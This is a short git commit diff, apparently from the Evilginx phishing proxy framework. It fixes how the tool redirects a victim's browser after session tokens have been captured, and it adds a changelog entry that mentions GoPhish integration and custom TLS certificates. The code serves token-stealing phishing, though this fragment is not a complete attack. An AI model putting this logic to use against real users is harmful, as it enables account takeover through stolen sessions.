fixed: redirection on page reload after session tokens are captured

2024-04-24 21:24:22 +02:00 · 2024-04-24 21:24:22 +02:00 · 9e32484719
commit 9e32484719
parent f0c8b028a5
2 changed files with 4 additions and 1 deletions
--- a/3
+++ b/3
@ -1,3 +1,6 @@
+# Unreleased
+- Fixed: Redirection to `redirect_url` on page reload after authorization tokens have been captured.
+
 # 3.3.0
 - Feature: Official GoPhish integration, using the fork: https://github.com/kgretzky/gophish
 - Feature: Added support to load custom TLS certificates from a public certificate file and a private key file stored in `~/.evilginx/crt/sites/<hostname>/`. Will load `fullchain.pem` and `privkey.pem` pair or a combination of a `.pem`/`.crt` (public certificate) and a `.key` (private key) file. Make sure to run without `-developer` flag and disable autocert retrieval with `config autocert off`.
--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@ -1226,7 +1226,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 				s, ok := p.sessions[ps.SessionId]
 				if ok && s.IsDone {
 					if s.RedirectURL != "" && s.RedirectCount == 0 {
-						if stringExists(mime, []string{"text/html"}) && resp.StatusCode == 200 && len(body) > 0 && stringExists(string(body), []string{"<head>", "<body>"}) {
+						if stringExists(mime, []string{"text/html"}) && resp.StatusCode == 200 && len(body) > 0 && (strings.Index(string(body), "</head>") >= 0 || strings.Index(string(body), "</body>") >= 0) {
 							// redirect only if received response content is of `text/html` content type
 							s.RedirectCount += 1
 							log.Important("[%d] redirecting to URL: %s (%d)", ps.Index, s.RedirectURL, s.RedirectCount)